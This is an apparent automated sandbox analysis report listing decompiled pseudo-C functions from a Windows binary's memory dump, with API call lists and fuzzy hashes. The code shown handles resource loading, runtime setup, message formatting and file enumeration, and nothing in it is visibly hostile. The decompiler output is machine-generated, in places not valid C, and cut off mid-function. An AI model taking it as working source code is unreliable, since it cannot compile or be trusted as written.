                • LoadBitmapW.USER32(00000065), ref: 00CBA508
                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBA529
                • DeleteObject.GDI32(00000000), ref: 00CBA551
                • DeleteObject.GDI32(00000000), ref: 00CBA570
                  • Part of subcall function 00CB963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00CBA54A,00000066), ref: 00CB964B
                  • Part of subcall function 00CB963A: SizeofResource.KERNEL32(00000000,76B95B70,?,?,00CBA54A,00000066), ref: 00CB9663
                  • Part of subcall function 00CB963A: LoadResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9676
                  • Part of subcall function 00CB963A: LockResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9681
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID:
                • API String ID: 142272564-0
                • Opcode ID: 008b74697e391aeca1379fbfff92492ad207f20379a1eea3a523354ea5bed8f8
                • Instruction ID: 7d54c783510100930cd384a8364c861053ac340960de2eaee3ed951bf5d81d90
                • Opcode Fuzzy Hash: 008b74697e391aeca1379fbfff92492ad207f20379a1eea3a523354ea5bed8f8
                • Instruction Fuzzy Hash: 0601D63298161527C72277A89C46FFF77AEDF85B51F090111FB40F7291DE618E0A62A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00CC1A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t25;
                				void* _t27;
                				void* _t28;
                				intOrPtr _t30;
                				intOrPtr* _t32;
                				void* _t34;
                
                				_t29 = __edx;
                				_t27 = __ebx;
                				_t36 = _a28;
                				_t30 = _a8;
                				if(_a28 != 0) {
                					_push(_a28);
                					_push(_a24);
                					_push(_t30);
                					_push(_a4);
                					E00CC20D8(__edx, _t36);
                					_t34 = _t34 + 0x10;
                				}
                				_t37 = _a40;
                				_push(_a4);
                				if(_a40 != 0) {
                					_push(_a40);
                				} else {
                					_push(_t30);
                				}
                				E00CBF1DB(_t28);
                				_t32 = _a32;
                				_push( *_t32);
                				_push(_a20);
                				_push(_a16);
                				_push(_t30);
                				E00CC22DA(_t27, _t28, _t29, _t30, _t37);
                				_push(0x100);
                				_push(_a36);
                				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                				_push( *((intOrPtr*)(_a24 + 0xc)));
                				_push(_a20);
                				_push(_a12);
                				_push(_t30);
                				_push(_a4);
                				_t25 = E00CC1893(_t29, _t32, _t37);
                				if(_t25 != 0) {
                					E00CBF1A9(_t25, _t30);
                					return _t25;
                				}
                				return _t25;
                			}

                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00CC1AA0
                  • Part of subcall function 00CC20D8: ___AdjustPointer.LIBCMT ref: 00CC2122
                • _UnwindNestedFrames.LIBCMT ref: 00CC1AB7
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00CC1AC9
                • CallCatchBlock.LIBVCRUNTIME ref: 00CC1AED
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                • Instruction ID: 83b1e2aa85ec711a63e9fe4232684d1ed46a071d5a5f04d9a00c4d45a12cbbd9
                • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                • Instruction Fuzzy Hash: 7501D732400109BBCF129F96CC01EDA3BBAEF59754F198519FD1865121D372E9A2EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CC15E6() {
                				void* _t4;
                				void* _t8;
                
                				E00CC29B7();
                				E00CC294B();
                				if(E00CC268E() != 0) {
                					_t4 = E00CC1726(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00CC26CA();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00CC15E6
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00CC15EB
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00CC15F0
                  • Part of subcall function 00CC268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00CC269F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00CC1605
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                • Instruction ID: 526c13816a726127a3e8a48405e30aaf719c064507c54a417fd7159d79044359
                • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                • Instruction Fuzzy Hash: 48C048A8400642945C203AB7E313FAD13004DA37C9B8D24CEFD622B4239D26090B3A36
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00CB975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                				signed int _v0;
                				signed int _v4;
                				void _v68;
                				signed int _v72;
                				signed int _v76;
                				char _v112;
                				intOrPtr _v116;
                				intOrPtr* _v120;
                				short _v122;
                				short _v124;
                				signed int _v128;
                				signed int _v132;
                				signed int _v136;
                				intOrPtr* _v140;
                				char _v144;
                				intOrPtr* _v152;
                				intOrPtr _v156;
                				intOrPtr* _v164;
                				char _v180;
                				intOrPtr* _v184;
                				intOrPtr* _v192;
                				intOrPtr* _v200;
                				intOrPtr* _v212;
                				signed int _v216;
                				signed int _v220;
                				intOrPtr* _v224;
                				char _v228;
                				intOrPtr _v232;
                				void* __edi;
                				signed int _t71;
                				intOrPtr* _t77;
                				void* _t78;
                				intOrPtr* _t79;
                				intOrPtr* _t81;
                				short _t89;
                				intOrPtr* _t93;
                				intOrPtr* _t95;
                				intOrPtr* _t97;
                				intOrPtr* _t101;
                				signed int _t103;
                				intOrPtr* _t111;
                				intOrPtr* _t113;
                				intOrPtr* _t115;
                				signed int _t120;
                				intOrPtr _t124;
                				intOrPtr* _t132;
                				intOrPtr* _t134;
                				void* _t146;
                				void* _t149;
                				signed int _t152;
                				void* _t154;
                				long long* _t155;
                				long long _t158;
                
                				_t158 = __fp0;
                				if(E00CB960F() != 0) {
                					_t146 = _a4;
                					GetObjectW(_t146, 0x18,  &_v68);
                					_t152 = _v4;
                					_t120 = _v0;
                					asm("cdq");
                					_t71 = _v72 * _t152 / _v76;
                					if(_t71 < _t120) {
                						_t120 = _t71;
                					}
                					_t149 = 0;
                					_push( &_v112);
                					_push(0xcd33ac);
                					_push(1);
                					_push(0);
                					_push(0xcd417c);
                					if( *0xcddff4() < 0) {
                						L18:
                						return _t146;
                					} else {
                						_t77 = _v132;
                						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
                						_t79 = _v152;
                						if(_t78 >= 0) {
                							_v144 = 0;
                							_push( &_v144);
                							_push(_t79);
                							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
                								_t81 = _v152;
                								asm("fldz");
                								_push(0);
                								_t124 =  *_t81;
                								_push(_t124);
                								_push(_t124);
                								 *_t155 = _t158;
                								_push(0);
                								_push(0);
                								_push(0xcd418c);
                								_push(_v156);
                								_push(_t81);
                								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
                									E00CBE920(_t146,  &_v136, 0, 0x2c);
                									_v136 = 0x28;
                									_v132 = _t152;
                									_v120 = 0;
                									_v128 =  ~_t120;
                									_v124 = 1;
                									_t89 = 0x20;
                									_v122 = _t89;
                									_t154 =  *0xcddedc(0,  &_v136, 0,  &_v180, 0, 0);
                									asm("sbb ecx, ecx");
                									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
                										_t132 = _v216;
                										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
                										_t101 = _v120;
                										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
                										_t103 = _v136;
                										_push(_v232);
                										_t134 = _v140;
                										_v220 = _t103;
                										_v228 = 0;
                										_v224 = 0;
                										_v216 = _t120;
                										_push(_t103 * _t120 << 2);
                										_push(_v136 << 2);
                										_push( &_v228);
                										_push(_t134);
                										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
                											DeleteObject(_t154);
                										} else {
                											_t149 = _t154;
                										}
                										_t111 = _v164;
                										 *((intOrPtr*)( *_t111 + 8))(_t111);
                									}
                									_t93 = _v212;
                									 *((intOrPtr*)( *_t93 + 8))(_t93);
                									_t95 = _v212;
                									 *((intOrPtr*)( *_t95 + 8))(_t95);
                									_t97 = _v224;
                									 *((intOrPtr*)( *_t97 + 8))(_t97);
                									if(_t149 != 0) {
                										_t146 = _t149;
                									}
                									goto L18;
                								}
                								_t113 = _v184;
                								 *((intOrPtr*)( *_t113 + 8))(_t113);
                							}
                							_t115 = _v192;
                							 *((intOrPtr*)( *_t115 + 8))(_t115);
                							_t79 = _v200;
                						}
                						 *((intOrPtr*)( *_t79 + 8))(_t79);
                						goto L18;
                					}
                				}
                				_push(_a12);
                				_push(_a8);
                				_push(_a4);
                				return E00CB9954();
                			}

                APIs
                  • Part of subcall function 00CB960F: GetDC.USER32(00000000), ref: 00CB9613
                  • Part of subcall function 00CB960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB961E
                  • Part of subcall function 00CB960F: ReleaseDC.USER32(00000000,00000000), ref: 00CB9629
                • GetObjectW.GDI32(?,00000018,?,00000000,?,76B95B70), ref: 00CB978E
                  • Part of subcall function 00CB9954: GetDC.USER32(00000000), ref: 00CB995D
                  • Part of subcall function 00CB9954: GetObjectW.GDI32(?,00000018,?,?,?,76B95B70,?,?,?,?,?,00CB977A,?,?,?), ref: 00CB998C
                  • Part of subcall function 00CB9954: ReleaseDC.USER32(00000000,?), ref: 00CB9A20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: a1252e5b177ffb3f2413cd233fb8fb4f2a078a92f0d7e91ed2ed198a4460a7e9
                • Instruction ID: 16152a11d9966932313a1630abbad2a84f10bf78affb0dfafddf35d9f53e12c6
                • Opcode Fuzzy Hash: a1252e5b177ffb3f2413cd233fb8fb4f2a078a92f0d7e91ed2ed198a4460a7e9
                • Instruction Fuzzy Hash: 12611671608201AFD214CF65C888EABBBE8FF89704F10491DF69AC7260DB71E905CB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00CB0A9F(intOrPtr* __ecx) {
                				char _v516;
                				signed int _t26;
                				void* _t28;
                				void* _t32;
                				signed int _t33;
                				signed int _t34;
                				signed int _t35;
                				signed int _t38;
                				void* _t47;
                				void* _t48;
                
                				_t41 = __ecx;
                				_t44 = __ecx;
                				_t26 =  *(__ecx + 0x48);
                				_t47 = _t26 - 0x6f;
                				if(_t47 > 0) {
                					__eflags = _t26 - 0x7d;
                					if(_t26 == 0x7d) {
                						E00CBC339();
                						_t28 = E00CADA42(_t41, 0x96);
                						return E00CB9735( *0xce75d8, E00CADA42(_t41, 0xc9), _t28, 0);
                					}
                				} else {
                					if(_t47 == 0) {
                						_push(0x456);
                						L38:
                						_push(E00CADA42(_t41));
                						_push( *_t44);
                						L19:
                						_t32 = E00CBA57D();
                						L11:
                						return _t32;
                					}
                					_t48 = _t26 - 0x16;
                					if(_t48 > 0) {
                						__eflags = _t26 - 0x38;
                						if(__eflags > 0) {
                							_t33 = _t26 - 0x39;
                							__eflags = _t33;
                							if(_t33 == 0) {
                								_push(0x8c);
                								goto L38;
                							}
                							_t34 = _t33 - 1;
                							__eflags = _t34;
                							if(_t34 == 0) {
                								_push(0x6f);
                								goto L38;
                							}
                							_t35 = _t34 - 1;
                							__eflags = _t35;
                							if(_t35 == 0) {
                								_push( *((intOrPtr*)(__ecx + 4)));
                								_push(0x406);
                								goto L13;
                							}
                							_t38 = _t35 - 9;
                							__eflags = _t38;
                							if(_t38 == 0) {
                								_push(0x343);
                								goto L38;
                							}
                							_t26 = _t38 - 1;
                							__eflags = _t26;
                							if(_t26 == 0) {
                								_push(0x86);
                								goto L38;
                							}
                						} else {
                							if(__eflags == 0) {
                								_push(0x67);
                								goto L38;
                							}
                							_t26 = _t26 - 0x17;
                							__eflags = _t26 - 0xb;
                							if(_t26 <= 0xb) {
                								switch( *((intOrPtr*)(_t26 * 4 +  &M00CB0D63))) {
                									case 0:
                										_push(0xde);
                										goto L18;
                									case 1:
                										_push(0xe1);
                										goto L18;
                									case 2:
                										_push(0xb4);
                										goto L38;
                									case 3:
                										_push(0x69);
                										goto L38;
                									case 4:
                										_push(0x6a);
                										goto L38;
                									case 5:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x68);
                										goto L13;
                									case 6:
                										_push(0x46f);
                										goto L38;
                									case 7:
                										_push(0x470);
                										goto L38;
                									case 8:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x471);
                										goto L13;
                									case 9:
                										goto L61;
                									case 0xa:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x71);
                										goto L13;
                									case 0xb:
                										E00CADA42(__ecx, 0xc8) =  &_v516;
                										__eax = E00CA3E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
                										_push( *((intOrPtr*)(__esi + 8)));
                										__eax =  &_v516;
                										_push( &_v516);
                										return E00CBA57D( *__esi, L"%s: %s");
                								}
                							}
                						}
                					} else {
                						if(_t48 == 0) {
                							_push( *__ecx);
                							_push(0xdd);
                							L23:
                							E00CADA42(_t41);
                							L7:
                							_push(0);
                							L8:
                							return E00CBA57D();
                						}
                						if(_t26 <= 0x15) {
                							switch( *((intOrPtr*)(_t26 * 4 +  &M00CB0D0B))) {
                								case 0:
                									_push( *__esi);
                									_push(L"%ls");
                									_push(">");
                									goto L8;
                								case 1:
                									_push( *__ecx);
                									_push(L"%ls");
                									goto L7;
                								case 2:
                									_push(0);
                									__eax = E00CB9D55();
                									goto L11;
                								case 3:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7b);
                									goto L13;
                								case 4:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7a);
                									goto L13;
                								case 5:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7c);
                									goto L13;
                								case 6:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0xca);
                									goto L13;
                								case 7:
                									_push(0x70);
                									L18:
                									_push(E00CADA42(_t41));
                									_push(0);
                									goto L19;
                								case 8:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x72);
                									goto L13;
                								case 9:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x78);
                									goto L13;
                								case 0xa:
                									_push( *__esi);
                									_push(0x85);
                									goto L23;
                								case 0xb:
                									_push( *__esi);
                									_push(0x204);
                									goto L23;
                								case 0xc:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x84);
                									goto L13;
                								case 0xd:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x83);
                									goto L13;
                								case 0xe:
                									goto L61;
                								case 0xf:
                									_push( *((intOrPtr*)(__esi + 8)));
                									_push( *((intOrPtr*)(__esi + 4)));
                									__eax = E00CADA42(__ecx, 0xd2);
                									return __eax;
                								case 0x10:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x79);
                									goto L13;
                								case 0x11:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0xdc);
                									L13:
                									_push(E00CADA42(_t41));
                									_push( *_t44);
                									goto L8;
                							}
                						}
                					}
                				}
                				L61:
                				return _t26;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 00e25c2f93761441d79874314800e1029fb61e04fe9f204fe09a952700428651
                • Instruction ID: c3cbc821413b48c0fc1c2875cd9171be19214cade55b720afa44ea05d58e9aec
                • Opcode Fuzzy Hash: 00e25c2f93761441d79874314800e1029fb61e04fe9f204fe09a952700428651
                • Instruction Fuzzy Hash: C1511A352CC301FBEA211B958D42FF77A59AB05B04F70C906B7DB684E3D6A26D20B603
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00CC9E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                				intOrPtr _v0;
                				char _v6;
                				char _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v36;
                				intOrPtr* _v64;
                				intOrPtr _v96;
                				intOrPtr* _v100;
                				CHAR* _v104;
                				signed int _v116;
                				char _v290;
                				signed int _v291;
                				struct _WIN32_FIND_DATAA _v336;
                				union _FINDEX_INFO_LEVELS _v340;
                				signed int _v344;
                				signed int _v348;
                				intOrPtr _v440;
                				intOrPtr* _t80;
                				signed int _t82;
                				signed int _t87;
                				signed int _t91;
                				signed int _t93;
                				signed int _t95;
                				signed int _t96;
                				signed int _t100;
                				signed int _t103;
                				signed int _t108;
                				signed int _t111;
                				intOrPtr _t113;
                				signed char _t115;
                				union _FINDEX_INFO_LEVELS _t123;
                				signed int _t128;
                				signed int _t131;
                				void* _t136;
                				void* _t138;
                				signed int _t139;
                				signed int _t142;
                				signed int _t144;
                				signed int _t146;
                				signed int* _t147;
                				signed int _t150;
                				void* _t153;
                				CHAR* _t154;
                				char _t157;
                				char _t159;
                				intOrPtr* _t162;
                				void* _t163;
                				intOrPtr* _t164;
                				signed int _t166;
                				void* _t168;
                				intOrPtr* _t169;
                				signed int _t173;
                				signed int _t177;
                				signed int _t178;
                				intOrPtr* _t183;
                				void* _t192;
                				intOrPtr _t193;
                				signed int _t195;
                				signed int _t196;
                				signed int _t198;
                				signed int _t199;
                				signed int _t201;
                				union _FINDEX_INFO_LEVELS _t202;
                				signed int _t207;
                				signed int _t209;
                				signed int _t210;
                				void* _t212;
                				intOrPtr _t213;
                				void* _t214;
                				signed int _t218;
                				void* _t220;
                				signed int _t221;
                				void* _t222;
                				void* _t223;
                				void* _t224;
                				signed int _t225;
                				void* _t226;
                				void* _t227;
                
                				_t80 = _a8;
                				_t223 = _t222 - 0x20;
                				if(_t80 != 0) {
                					_t207 = _a4;
                					_t159 = 0;
                					 *_t80 = 0;
                					_t198 = 0;
                					_t150 = 0;
                					_v36 = 0;
                					_v336.cAlternateFileName = 0;
                					_v28 = 0;
                					__eflags =  *_t207;
                					if( *_t207 == 0) {
                						L9:
                						_v12 = _v12 & 0x00000000;
                						_t82 = _t150 - _t198;
                						_v8 = _t159;
                						_t190 = (_t82 >> 2) + 1;
                						__eflags = _t150 - _t198;
                						_v16 = (_t82 >> 2) + 1;
                						asm("sbb esi, esi");
                						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
                						__eflags = _t209;
                						if(_t209 != 0) {
                							_t196 = _t198;
                							_t157 = _t159;
                							do {
                								_t183 =  *_t196;
                								_t17 = _t183 + 1; // 0x1
                								_v8 = _t17;
                								do {
                									_t142 =  *_t183;
                									_t183 = _t183 + 1;
                									__eflags = _t142;
                								} while (_t142 != 0);
                								_t157 = _t157 + 1 + _t183 - _v8;
                								_t196 = _t196 + 4;
                								_t144 = _v12 + 1;
                								_v12 = _t144;
                								__eflags = _t144 - _t209;
                							} while (_t144 != _t209);
                							_t190 = _v16;
                							_v8 = _t157;
                							_t150 = _v336.cAlternateFileName;
                						}
                						_t210 = E00CC6F0C(_t190, _v8, 1);
                						_t224 = _t223 + 0xc;
                						__eflags = _t210;
                						if(_t210 != 0) {
                							_t87 = _t210 + _v16 * 4;
                							_v20 = _t87;
                							_t191 = _t87;
                							_v16 = _t87;
                							__eflags = _t198 - _t150;
                							if(_t198 == _t150) {
                								L23:
                								_t199 = 0;
                								__eflags = 0;
                								 *_a8 = _t210;
                								goto L24;
                							} else {
                								_t93 = _t210 - _t198;
                								__eflags = _t93;
                								_v24 = _t93;
                								do {
                									_t162 =  *_t198;
                									_v12 = _t162 + 1;
                									do {
                										_t95 =  *_t162;
                										_t162 = _t162 + 1;
                										__eflags = _t95;
                									} while (_t95 != 0);
                									_t163 = _t162 - _v12;
                									_t35 = _t163 + 1; // 0x1
                									_t96 = _t35;
                									_push(_t96);
                									_v12 = _t96;
                									_t100 = E00CCDD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
                									_t224 = _t224 + 0x10;
                									__eflags = _t100;
                									if(_t100 != 0) {
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										E00CC7DBB();
                										asm("int3");
                										_t220 = _t224;
                										_push(_t163);
                										_t164 = _v64;
                										_t47 = _t164 + 1; // 0x1
                										_t192 = _t47;
                										do {
                											_t103 =  *_t164;
                											_t164 = _t164 + 1;
                											__eflags = _t103;
                										} while (_t103 != 0);
                										_push(_t198);
                										_t201 = _a8;
                										_t166 = _t164 - _t192 + 1;
                										_v12 = _t166;
                										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
                										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
                											_push(_t150);
                											_t50 = _t201 + 1; // 0x1
                											_t153 = _t50 + _t166;
                											_t212 = E00CC7B1B(_t166, _t153, 1);
                											_t168 = _t210;
                											__eflags = _t201;
                											if(_t201 == 0) {
                												L34:
                												_push(_v12);
                												_t153 = _t153 - _t201;
                												_t108 = E00CCDD71(_t168, _t212 + _t201, _t153, _v0);
                												_t225 = _t224 + 0x10;
                												__eflags = _t108;
                												if(__eflags != 0) {
                													goto L37;
                												} else {
                													_t136 = E00CCA212(_a12, _t192, __eflags, _t212);
                													E00CC7A50(0);
                													_t138 = _t136;
                													goto L36;
                												}
                											} else {
                												_push(_t201);
                												_t139 = E00CCDD71(_t168, _t212, _t153, _a4);
                												_t225 = _t224 + 0x10;
                												__eflags = _t139;
                												if(_t139 != 0) {
                													L37:
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													E00CC7DBB();
                													asm("int3");
                													_push(_t220);
                													_t221 = _t225;
                													_t226 = _t225 - 0x150;
                													_t111 =  *0xcdd668; // 0x814d2927
                													_v116 = _t111 ^ _t221;
                													_t169 = _v100;
                													_push(_t153);
                													_t154 = _v104;
                													_push(_t212);
                													_t213 = _v96;
                													_push(_t201);
                													_v440 = _t213;
                													while(1) {
                														__eflags = _t169 - _t154;
                														if(_t169 == _t154) {
                															break;
                														}
                														_t113 =  *_t169;
                														__eflags = _t113 - 0x2f;
                														if(_t113 != 0x2f) {
                															__eflags = _t113 - 0x5c;
                															if(_t113 != 0x5c) {
                																__eflags = _t113 - 0x3a;
                																if(_t113 != 0x3a) {
                																	_t169 = E00CCDDC0(_t154, _t169);
                																	continue;
                																}
                															}
                														}
                														break;
                													}
                													_t193 =  *_t169;
                													__eflags = _t193 - 0x3a;
                													if(_t193 != 0x3a) {
                														L47:
                														_t202 = 0;
                														__eflags = _t193 - 0x2f;
                														if(_t193 == 0x2f) {
                															L51:
                															_t115 = 1;
                															__eflags = 1;
                														} else {
                															__eflags = _t193 - 0x5c;
                															if(_t193 == 0x5c) {
                																goto L51;
                															} else {
                																__eflags = _t193 - 0x3a;
                																if(_t193 == 0x3a) {
                																	goto L51;
                																} else {
                																	_t115 = 0;
                																}
                															}
                														}
                														asm("sbb eax, eax");
                														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                														E00CBE920(_t202,  &_v336, _t202, 0x140);
                														_t227 = _t226 + 0xc;
                														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
                														_t123 = _v340;
                														__eflags = _t214 - 0xffffffff;
                														if(_t214 != 0xffffffff) {
                															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                															__eflags = _t173;
                															_v348 = _t173 >> 2;
                															do {
                																__eflags = _v336.cFileName - 0x2e;
                																if(_v336.cFileName != 0x2e) {
                																	L64:
                																	_push(_t123);
                																	_push(_v344);
                																	_t123 =  &(_v336.cFileName);
                																	_push(_t154);
                																	_push(_t123);
                																	L28();
                																	_t227 = _t227 + 0x10;
                																	__eflags = _t123;
                																	if(_t123 != 0) {
                																		goto L54;
                																	} else {
                																		goto L65;
                																	}
                																} else {
                																	_t177 = _v291;
                																	__eflags = _t177;
                																	if(_t177 == 0) {
                																		goto L65;
                																	} else {
                																		__eflags = _t177 - 0x2e;
                																		if(_t177 != 0x2e) {
                																			goto L64;
                																		} else {
                																			__eflags = _v290;
                																			if(_v290 == 0) {
                																				goto L65;
                																			} else {
                																				goto L64;
                																			}
                																		}
                																	}
                																}
                																goto L58;
                																L65:
                																_t128 = FindNextFileA(_t214,  &_v336);
                																__eflags = _t128;
                																_t123 = _v340;
                															} while (_t128 != 0);
                															_t194 =  *_t123;
                															_t178 = _v348;
                															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                															__eflags = _t178 - _t131;
                															if(_t178 != _t131) {
                																E00CC5030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00CC9E2B);
                															}
                														} else {
                															_push(_t123);
                															_push(_t202);
                															_push(_t202);
                															_push(_t154);
                															L28();
                															L54:
                															_t202 = _t123;
                														}
                														__eflags = _t214 - 0xffffffff;
                														if(_t214 != 0xffffffff) {
                															FindClose(_t214);
                														}
                														_t124 = _t202;
                													} else {
                														_t124 =  &(_t154[1]);
                														__eflags = _t169 -  &(_t154[1]);
                														if(_t169 ==  &(_t154[1])) {
                															goto L47;
                														} else {
                															_push(_t213);
                															_push(0);
                															_push(0);
                															_push(_t154);
                															L28();
                														}
                													}
                													L58:
                													__eflags = _v16 ^ _t221;
                													return E00CBE203(_t124, _v16 ^ _t221);
                												} else {
                													goto L34;
                												}
                											}
                										} else {
                											_t138 = 0xc;
                											L36:
                											return _t138;
                										}
                									} else {
                										goto L22;
                									}
                									goto L68;
                									L22:
                									_t195 = _v16;
                									 *((intOrPtr*)(_v24 + _t198)) = _t195;
                									_t198 = _t198 + 4;
                									_t191 = _t195 + _v12;
